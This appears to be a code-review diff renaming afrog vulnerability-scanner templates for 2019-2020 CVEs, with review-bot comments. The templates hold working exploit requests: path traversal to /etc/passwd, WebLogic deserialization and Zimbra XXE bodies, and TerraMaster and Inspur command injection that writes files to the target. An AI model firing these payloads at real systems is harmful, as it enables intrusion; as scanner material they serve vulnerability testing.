    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /Pages/login.htm
    16 13   expression: response.status == 200 && response.body.bcontains(b"<title>NVMS-1000</title>")
    17 14   r1:
    18 15   request:
    19  - cache: true
    20 16   method: GET
    21 17   path: /../../../../../../../../../../../../windows/win.ini
    22 18   expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
    skipped 2 lines
    afrog-pocs/unreviewed/pandorafms-cve-2019-20224-rce.yml afrog-pocs/CVE/2019/CVE-2019-20224.yaml
    1  -id: pandorafms-cve-2019-20224-rce
     1 +id: CVE-2019-20224
    2 2   
    3 3  info:
    4  - name: pandorafms-cve-2019-20224-rce
     4 + name: Pandora v7.0NG Post-auth Remote Code Execution
    5 5   author: JingLing(https://hackfun.org/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   reverse: newReverse()
    12 10   reverseURL: reverse.url
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
    19 16   headers:
    skipped 7 lines
    afrog-pocs/cve/2019/weblogic-cve-2019-2725.yml afrog-pocs/CVE/2019/CVE-2019-2725.yaml
    1  -id: weblogic-cve-2019-2725
     1 +id: CVE-2019-2725
    2 2   
    3 3  info:
    4  - name: weblogic-cve-2019-2725
     4 + name: Oracle WebLogic Remote Code Execution
    5 5   author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166)
    6 6   severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   v100:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /wls-wsat/CoordinatorPortType
    16 13   headers:
    skipped 15052 lines
    15069 15066   </soapenv:Header>
    15070 15067   <soapenv:Body></soapenv:Body>
    15071 15068   </soapenv:Envelope>
    15072  - follow_redirects: false
    15073 15069   expression: response.status == 200 && response.body.bcontains(b"whoami :")
    15074 15070   v120:
    15075 15071   request:
    15076  - cache: true
    15077 15072   method: POST
    15078 15073   path: /wls-wsat/CoordinatorPortType
    15079 15074   headers:
    15080 15075   Content-Type: text/xml
    15081 15076   body: <?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"/><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void><void method="getWriter"><void method="write"><string/></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    15082  - follow_redirects: true
    15083 15077   expression: response.body.bcontains(b"225773091")
    15084 15078  expression: v120() || v100()
    15085 15079   
    skipped 1 lines
    afrog-pocs/cve/2019/weblogic-cve-2019-2729.yml afrog-pocs/CVE/2019/CVE-2019-2729.yaml
    1  -id: weblogic-cve-2019-2729
     1 +id: CVE-2019-2729
    2 2   
    3 3  info:
    4  - name: weblogic-cve-2019-2729
    5  - author:
     4 + name: Oracle WebLogic Remote Code Execution
     5 + author: unkown
    6 6   severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /wls-wsat/CoordinatorPortType
    16 13   headers:
    skipped 15055 lines
    15072 15069   <asy:onAsyncDelivery/>
    15073 15070   </soapenv:Body>
    15074 15071   </soapenv:Envelope>
    15075  - follow_redirects: false
    15076 15072   expression: response.status == 200 && response.body.bcontains(b"whoami :")
    15077 15073  expression: r0()
    15078 15074   
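Review bot: `author: unkown` on the new side of the info block is misspelled; `author: unknown` is what a reader of the PoC listing expects. The middle of this section (15055 lines of the serialized SOAP body) is collapsed on this page, so the request body itself was not reviewed. A related identifier slip sits in the youphptube rename further down: the new path reads `afrog-pocs/CVE/2019/CVE-2019-5127.yaml` while the id inside becomes `CVE-2019-5128`, so one of the two numbers is wrong and should be reconciled with the advisory before the rename lands.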
    afrog-pocs/unreviewed/confluence-cve-2019-3396-lfi.yml afrog-pocs/CVE/2019/CVE-2019-3396.yaml
    1  -id: confluence-cve-2019-3396-lfi
     1 +id: CVE-2019-3396
    2 2   
    3 3  info:
    4  - name: confluence-cve-2019-3396-lfi
     4 + name: Atlassian Confluence Path Traversal
    5 5   author: sharecast
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /rest/tinymce/1/macro/preview
    16 13   headers:
    skipped 8 lines
    afrog-pocs/unreviewed/springcloud-cve-2019-3799.yml afrog-pocs/CVE/2019/CVE-2019-3799.yaml
    1  -id: springcloud-cve-2019-3799
     1 +id: CVE-2019-3799
    2 2   
    3 3  info:
    4  - name: springcloud-cve-2019-3799
     4 + name: Spring Cloud Config Server Directory Traversal
    5 5   author: Loneyer
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd
    16 13   follow_redirects: true
    skipped 3 lines
    afrog-pocs/unreviewed/youphptube-encoder-cve-2019-5128.yml afrog-pocs/CVE/2019/CVE-2019-5127.yaml
    1  -id: youphptube-encoder-cve-2019-5128
     1 +id: CVE-2019-5128
    2 2   
    3 3  info:
    4 4   name: youphptube-encoder-cve-2019-5128
    skipped 26 lines
    afrog-pocs/unreviewed/drupal-cve-2019-6340.yml afrog-pocs/CVE/2019/CVE-2019-6340.yaml
    1  -id: drupal-cve-2019-6340
     1 +id: CVE-2019-6340
    2 2   
    3 3  info:
    4  - name: drupal-cve-2019-6340
     4 + name: Drupal 8 core RESTful Web Services RCE
    5 5   author: thatqier
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   host: request.url.host
    12 10   r1: randomLowercase(4)
    skipped 1 lines
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: POST
    19 16   path: /node/?_format=hal_json
    20 17   headers:
    skipped 20 lines
    afrog-pocs/unreviewed/qnap-cve-2019-7192.yml afrog-pocs/CVE/2019/CVE-2019-7192.yaml
    1  -id: qnap-cve-2019-7192
     1 +id: CVE-2019-7192
    2 2   
    3 3  info:
    4  - name: qnap-cve-2019-7192
     4 + name: QNAP PhotoStation Unauthorizated File Read
    5 5   author: Hzllaga
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /photo/p/api/album.php
    16 13   headers:
    skipped 5 lines
    22 19   album_id: search["album_id"]
    23 20   r1:
    24 21   request:
    25  - cache: true
    26 22   method: GET
    27 23   path: /photo/slideshow.php?album={{album_id}}
    28 24   expression: response.status == 200
    skipped 2 lines
    31 27   access_code: search["access_code"]
    32 28   r2:
    33 29   request:
    34  - cache: true
    35 30   method: POST
    36 31   path: /photo/p/api/video.php
    37 32   headers:
    skipped 6 lines
    afrog-pocs/unreviewed/nexus-cve-2019-7238.yml afrog-pocs/CVE/2019/CVE-2019-7238.yaml
    1  -id: nexus-cve-2019-7238
     1 +id: CVE-2019-7238
    2 2   
    3 3  info:
    4  - name: nexus-cve-2019-7238
     4 + name: NEXUS < 3.14.0 Remote Code Execution
    5 5   author: hanxiansheng26(https://github.com/hanxiansheng26)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /service/extdirect
    19 16   headers:
    skipped 7 lines
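--- /dev/null
+++ b/afrog-pocs/CVE/2019/CVE-2019-8442.yaml
@@ -0,0 +1,20 @@
+id: CVE-2019-8442
+ 
+info:
+ name: Atlassian Jira webroot leak
+ author: pa55w0rd(www.pa55w0rd.online/)
+ severity: high
+ description: |
+ Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
+ Atlassian Jira 7.13.4之前版本、8.0.4之前版本和8.1.1之前版本中的CachingResourceDownloadRewriteRule类存在安全漏洞。远程攻击者可利用该漏洞访问Jira webroot中的文件。
+ 
+transport: http
+rules:
+ r0:
+ request:
+ method: GET
+ path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
+ expression: response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
+expression: r0()
+ 
+ 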
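Review bot: This new file keeps `transport: http` while every other PoC touched in this commit has that key removed, so it is either an oversight or the key is still accepted; if the latter, it deserves a line in the commit description. The match `response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>")))` round-trips a bytes literal through string and back for no effect; `response.body.bcontains(b"<groupId>com.atlassian.jira</groupId>")` is equivalent and is the form the other rules in this commit use. The file also ends with two whitespace-only lines and, unlike the renamed Jira entry CVE-2019-8449, carries no `reference` list; `- https://nvd.nist.gov/vuln/detail/CVE-2019-8442` under a `reference:` key would follow that pattern.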
    afrog-pocs/cve/2019/jira-cve-2019-8449.yml afrog-pocs/CVE/2019/CVE-2019-8449.yaml
    1  -id: jira-cve-2019-8449
     1 +id: CVE-2019-8449
    2 2   
    3 3  info:
    4  - name: jira-cve-2019-8449
     4 + name: Jira Information Disclosure
    5 5   author: MaxSecurity(https://github.com/MaxSecurity)
    6 6   severity: medium
     7 + reference:
     8 + - https://nvd.nist.gov/vuln/detail/CVE-2019-8449
    7 9   
    8  -manual: true
    9  -transport: http
    10 10  rules:
    11 11   r0:
    12 12   request:
    13  - cache: true
    14 13   method: GET
    15 14   path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
    16 15   expression: response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
    skipped 3 lines
    afrog-pocs/cve/2019/jira-ssrf-cve-2019-8451.yml afrog-pocs/CVE/2019/CVE-2019-8451.yaml
    1  -id: jira-ssrf-cve-2019-8451
     1 +id: CVE-2019-8451
    2 2   
    3 3  info:
    4  - name: jira-ssrf-cve-2019-8451
     4 + name: Jira SSRF
    5 5   author: zan8in
    6 6   severity: medium
    7 7   description: "Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。"
    skipped 19 lines
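--- a/afrog-pocs/unreviewed/zimbra-cve-2019-9670-xxe.yml
+++ b/afrog-pocs/CVE/2019/CVE-2019-9670.yaml
@@ -1,22 +1,18 @@
-id: zimbra-cve-2019-9670-xxe
+id: CVE-2019-9670
  
 info:
- name: zimbra-cve-2019-9670-xxe
+ name: Zimbra Collaboration XXE
  author: fnmsd(https://blog.csdn.net/fnmsd)
- severity: high
+ severity: critical
  
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: POST
  path: /Autodiscover/Autodiscover.xml
  headers:
  Content-Type: text/xml
  body: <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
- follow_redirects: false
  expression: response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available")
 expression: r0()
  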
    afrog-pocs/cve/2020/solarwinds-cve-2020-10148.yml afrog-pocs/CVE/2020/CVE-2020-10148.yaml
    1  -id: solarwinds-cve-2020-10148
     1 +id: CVE-2020-10148
    2 2   
    3 3  info:
    4  - name: solarwinds-cve-2020-10148
     4 + name: SolarWinds Orion Platform Authentication Bypass
    5 5   author: su(https://suzzz112113.github.io/#blog)
    6 6   severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /web.config.i18n.ashx?l=en-US&v={{r1}}
    18 15   expression: response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
    skipped 2 lines
    afrog-pocs/unreviewed/nexus-cve-2020-10199.yml afrog-pocs/CVE/2020/CVE-2020-10199.yaml
    1  -id: nexus-cve-2020-10199
     1 +id: CVE-2020-10199
    2 2   
    3 3  info:
    4  - name: nexus-cve-2020-10199
     4 + name: Nexus Repository before 3.21.2 allows JavaEL Injection
    5 5   author: kingkk(https://www.kingkk.com/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /rest/beta/repositories/go/group
    19 16   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/nexus-cve-2020-10204.yml afrog-pocs/CVE/2020/CVE-2020-10204.yaml
    1  -id: nexus-cve-2020-10204
     1 +id: CVE-2020-10204
    2 2   
    3 3  info:
    4  - name: nexus-cve-2020-10204
     4 + name: Nexus Repository before 3.21.2 Remote Code Execution
    5 5   author: kingkk(https://www.kingkk.com/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /extdirect
    19 16   headers:
    skipped 7 lines
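Review bot: Line 6 keeps `severity: high` for a rule this commit now titles "Nexus Repository before 3.21.2 Remote Code Execution", while the same commit raises other RCE entries (CVE-2020-21224, CVE-2021-22986, CVE-2020-28188) to `critical`. If the severity scale is meant to be consistent across the corpus this should read `severity: critical`; if the EL-injection path is deliberately rated lower, a one-line reason in `description` would stop the next pass from "fixing" it. The request headers, body and expression are in the collapsed lines, so the detection itself could not be checked here.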
    afrog-pocs/cve/2020/kong-cve-2020-11710-unauth.yml afrog-pocs/CVE/2020/CVE-2020-11710.yaml
    1  -id: kong-cve-2020-11710-unauth
     1 +id: CVE-2020-11710
    2 2   
    3 3  info:
    4  - name: kong-cve-2020-11710-unauth
     4 + name: Kong API Gateway Unauthorized
    5 5   author: Loneyer
    6 6   severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /
    16 13   expression: response.status == 200 && response.body.bcontains(b"kong_env")
    17 14   r1:
    18 15   request:
    19  - cache: true
    20 16   method: GET
    21 17   path: /status
    22 18   expression: response.status == 200 && response.body.bcontains(b"kong_db_cache_miss")
    skipped 2 lines
    afrog-pocs/cve/2020/apache-kylin-unauth-cve-2020-13937.yml afrog-pocs/CVE/2020/CVE-2020-13937.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://kylin.apache.org/docs/release_notes.html
    10 10   - https://s.tencent.com/research/bsafe/1156.html
    11  - tags: cve,cve2020,apache
    12  - classification:
    13  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    14  - cvss-score: 5.30
    15  - cve-id: CVE-2020-13937
    16  - cwe-id: CWE-922
    17 11   
    18  -manual: true
    19  -transport: http
    20 12  rules:
    21 13   r0:
    22 14   request:
    23  - cache: true
    24 15   method: GET
    25 16   path: /kylin/api/admin/config
    26 17   expression: response.status == 200 && response.headers["content-type"].icontains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
    skipped 2 lines
    afrog-pocs/cve/2020/jira-cve-2020-14179.yml afrog-pocs/CVE/2020/CVE-2020-14179.yaml
    1  -id: jira-cve-2020-14179
     1 +id: CVE-2020-14179
    2 2   
    3 3  info:
    4  - name: jira-cve-2020-14179
     4 + name: Jira Information Disclosure
    5 5   author: harris2015(https://github.com/harris2015)
    6 6   severity: medium
    7 7   
    skipped 10 lines
    afrog-pocs/cve/2020/jira-cve-2020-14181.yml afrog-pocs/CVE/2020/CVE-2020-14181.yaml
    1  -id: jira-cve-2020-14181
     1 +id: CVE-2020-14181
    2 2   
    3 3  info:
    4  - name: jira-cve-2020-14181
     4 + name: Jira Unauthorized User Enumeration
    5 5   author: whwlsfb(https://github.com/whwlsfb)
    6 6   severity: medium
    7 7   
    8  -transport: http
    9 8  set:
    10 9   r: randomLowercase(8)
    11 10  rules:
    skipped 8 lines
    afrog-pocs/cve/2020/weblogic-cve-2020-14750.yml afrog-pocs/CVE/2020/CVE-2020-14750.yaml
    1  -id: weblogic-cve-2020-14750
     1 +id: CVE-2020-14750
    2 2   
    3 3  info:
    4  - name: weblogic-cve-2020-14750
     4 + name: Oracle Weblogic Remote Command Execution
    5 5   author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless)
    6 6   severity: critical
    7 7   
    skipped 12 lines
    afrog-pocs/cve/2020/terramaster-cve-2020-15568.yml afrog-pocs/CVE/2020/CVE-2020-15568.yaml
    skipped 6 lines
    7 7   description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
    8 8   reference:
    9 9   - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
    10  - tags: cve,cve2020,terramaster,rce
    11  - classification:
    12  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    13  - cvss-score: 9.80
    14  - cve-id: CVE-2020-15568
    15  - cwe-id: CWE-913
    16 10   
    17  -manual: true
    18  -transport: http
    19 11  set:
    20 12   r1: randomLowercase(10)
    21 13   r2: randomInt(800000000, 1000000000)
    skipped 1 lines
    23 15  rules:
    24 16   r0:
    25 17   request:
    26  - cache: true
    27 18   method: GET
    28 19   path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20{{r2}}%20%2B%20{{r3}})%3E{{r1}}
    29  - follow_redirects: false
    30 20   expression: response.status == 200
    31 21   r1:
    32 22   request:
    33  - cache: true
    34 23   method: GET
    35 24   path: /include/{{r1}}
    36 25   expression: response.status == 200 && response.body.bcontains(bytes(string(r2 + r3)))
    skipped 2 lines
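Review bot: The r0 request on line 19 redirects the `expr` output into `/include/{{r1}}` on the target and r1 reads it back on line 24, but nothing removes the file afterwards, so every positive scan leaves a web-reachable artifact in the application's include directory. Either add a rule after r1 that deletes `{{r1}}` through the same `_exec` call, or state in `description` that the scan writes a file the operator has to clean up. Line 20's `response.status == 200` on its own does not show the command ran; the real proof is the r1 body match, so consider tightening r0 or commenting why it is only a status gate.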
  • afrog-pocs/unreviewed/saltstack-cve-2020-16846.yml afrog-pocs/CVE/2020/CVE-2020-16846.yaml
    Content is identical
    afrog-pocs/unreviewed/flink-jobmanager-cve-2020-17519-lfi.yml afrog-pocs/CVE/2020/CVE-2020-17519.yaml
    1  -id: flink-jobmanager-cve-2020-17519-lfi
     1 +id: CVE-2020-17519
    2 2   
    3 3  info:
    4  - name: flink-jobmanager-cve-2020-17519-lfi
     4 + name: Apache Flink RESTful API Arbitrary File Read
    5 5   author: MaxSecurity(https://github.com/MaxSecurity)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
    16 13   expression: response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
    skipped 3 lines
    afrog-pocs/unreviewed/inspur-tscev4-cve-2020-21224-rce.yml afrog-pocs/CVE/2020/CVE-2020-21224.yaml
    1  -id: inspur-tscev4-cve-2020-21224-rce
     1 +id: CVE-2020-21224
    2 2   
    3 3  info:
    4  - name: inspur-tscev4-cve-2020-21224-rce
     4 + name: Inspur ClusterEngine V4.0 Remote Code Execution
    5 5   author: jingling(https://github.com/shmilylty)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /login
    19 16   body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}`
    skipped 4 lines
    afrog-pocs/unreviewed/nexusdb-cve-2020-24571-path-traversal.yml afrog-pocs/CVE/2020/CVE-2020-24571.yaml
    1  -id: nexusdb-cve-2020-24571-path-traversal
     1 +id: CVE-2020-24571
    2 2   
    3 3  info:
    4  - name: nexusdb-cve-2020-24571-path-traversal
     4 + name: NexusDB v4.50.22 Path Traversal
    5 5   author: su(https://suzzz112113.github.io/#blog)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /../../../../../../../../windows/win.ini
    16 13   follow_redirects: true
    skipped 4 lines
    afrog-pocs/cve/2020/dlink-cve-2020-25078-account-disclosure.yml afrog-pocs/CVE/2020/CVE-2020-25078.yaml
    1  -id: dlink-cve-2020-25078-account-disclosure
     1 +id: CVE-2020-25078
    2 2   
    3 3  info:
    4  - name: dlink-cve-2020-25078-account-disclosure
     4 + name: DLink Account Disclosure
    5 5   author: kzaopa(https://github.com/kzaopa)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /config/getuser?index=0
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
    18 14  expression: r0()
    19 15   
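Review bot: Line 13 uses the case-sensitive `response.headers["Content-Type"].contains("text/plain")` while other rules in this commit match the media type with `icontains` (the Jira rule's `response.content_type.icontains("json")`); depending on how the engine normalises header names, a device that answers `Text/Plain` or spells the header differently is missed. Suggest `response.content_type.icontains("text/plain")` for consistency. Dropping `follow_redirects: false` (old line 16) also changes what a redirecting device returns here if the engine's default is to follow redirects, which is worth confirming.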
    afrog-pocs/cve/2020/CVE-2020-26413.yml afrog-pocs/CVE/2020/CVE-2020-26413.yaml
    1 1  id: CVE-2020-26413
    2 2   
    3 3  info:
    4  - name: gitlab-graphql-info-leak-cve-2020-26413
     4 + name: GitLab Information Disclosure
    5 5   author: Print1n(https://github.com/Print1n)
    6 6   severity: medium
    7 7   description: fofa app="GitLab"
    8 8   
    9  -manual: true
    10  -transport: http
    11 9  rules:
    12 10   r0:
    13 11   request:
    14  - cache: true
    15 12   method: POST
    16 13   path: /api/graphql
    17 14   headers:
    skipped 5 lines
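Review bot: Line 7 keeps `description: fofa app="GitLab"`, which is a search-engine fingerprint query rather than a description of the vulnerability, and it is the only text a user sees next to a `medium` finding. Replace it with a sentence describing what the GraphQL request discloses, and move the query to whatever field this corpus uses for fingerprints if one exists. The request body and expression are in the collapsed lines, so they could not be checked.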
    afrog-pocs/unreviewed/sonarqube-cve-2020-27986-unauth.yml afrog-pocs/CVE/2020/CVE-2020-27986.yaml
    1  -id: sonarqube-cve-2020-27986-unauth
     1 +id: CVE-2020-27986
    2 2   
    3 3  info:
    4  - name: sonarqube-cve-2020-27986-unauth
     4 + name: SonarQube unauth
    5 5   author: pa55w0rd(www.pa55w0rd.online/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /api/settings/values
    16 13   expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id")))
    skipped 2 lines
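Review bot: The new `name: SonarQube unauth` on line 4 is terser than the other renamed entries and does not say what is exposed; the rule reads `/api/settings/values` and matches `sonar.core.id`, so `name: SonarQube Unauthenticated Settings Disclosure` describes it from what is visible. The `bytes(string(b"..."))` conversions on line 13 round-trip a byte literal for no gain; `response.body.bcontains(b"sonar.core.id")` as used elsewhere in this commit is equivalent and easier to read.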
  • afrog-pocs/cve/2020/CVE-2020-28185.yaml afrog-pocs/CVE/2020/CVE-2020-28185.yaml
    Content is identical
    afrog-pocs/cve/2020/CVE-2020-28187.yaml afrog-pocs/CVE/2020/CVE-2020-28187.yaml
    skipped 10 lines
    11 11   - https://nvd.nist.gov/vuln/detail/CVE-2020-28187
    12 12   - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2020-28187.md
    13 13   
    14  -manual: true
    15  -transport: http
    16 14  rules:
    17 15   r0:
    18 16   request:
    skipped 5 lines
    afrog-pocs/cve/2020/terramaster-tos-rce-cve-2020-28188.yml afrog-pocs/CVE/2020/CVE-2020-28188.yaml
    1  -id: erramaster-tos-rce-cve-2020-28188
     1 +id: CVE-2020-28188
    2 2   
    3 3  info:
    4  - name: erramaster-tos-rce-cve-2020-28188
     4 + name: TerraMaster TOS Unauthenticated Remote Command Execution
    5 5   author: Print1n
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(10)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php||
    18  - follow_redirects: false
    19 15   expression: response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime"))
    20 16   r1:
    21 17   request:
    22  - cache: true
    23 18   method: GET
    24 19   path: /{{r1}}.php
    25  - follow_redirects: false
    26 20   expression: response.status == 200 && response.body.bcontains(bytes(md5(r1)))
    27 21  expression: r0() && r1()
    28 22   
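Review bot: The clean-up of the file written by r0 depends on r1 running, but the final `r0() && r1()` on line 21 short-circuits when r0's expression fails, and r0 on line 15 requires `text/csv` plus `Service,DateTime`; a host that executes the injected command on line 14 yet answers differently never receives the GET on line 19, so `/usr/www/{{r1}}.php` (chmod 755) stays on the target. Whether the engine evaluates every rule before the final expression or stops at the first false is something to confirm; if it stops, make the clean-up request unconditional or document the leftover artifact in `description`. The raised `severity: critical` on line 6 is appropriate for unauthenticated command execution.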
    afrog-pocs/unreviewed/cisco-cve-2020-3452-readfile.yml afrog-pocs/CVE/2020/CVE-2020-3452.yaml
    1  -id: cisco-cve-2020-3452-readfile
     1 +id: CVE-2020-3452
    2 2   
    3 3  info:
    4  - name: cisco-cve-2020-3452-readfile
     4 + name: Cisco Read-Only Path Traversal
    5 5   author: JrD (https://github.com/JrDw0/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
    18 14  expression: r0()
    19 15   
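Review bot: Line 13 compares `response.headers["Content-Type"] == "application/octet-stream"` with exact equality, which fails if the appliance appends a parameter such as `; charset=...` or changes case, whereas sibling rules in this commit use `contains`/`icontains`. Suggest `response.content_type.icontains("application/octet-stream")`. The `INTERNAL_PASSWORD_ENABLED` body match is the strong signal here, so the header check can afford to be lenient.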
    afrog-pocs/unreviewed/opentsdb-cve-2020-35476-rce.yml afrog-pocs/CVE/2020/CVE-2020-35476.yaml
    1  -id: opentsdb-cve-2020-35476-rce
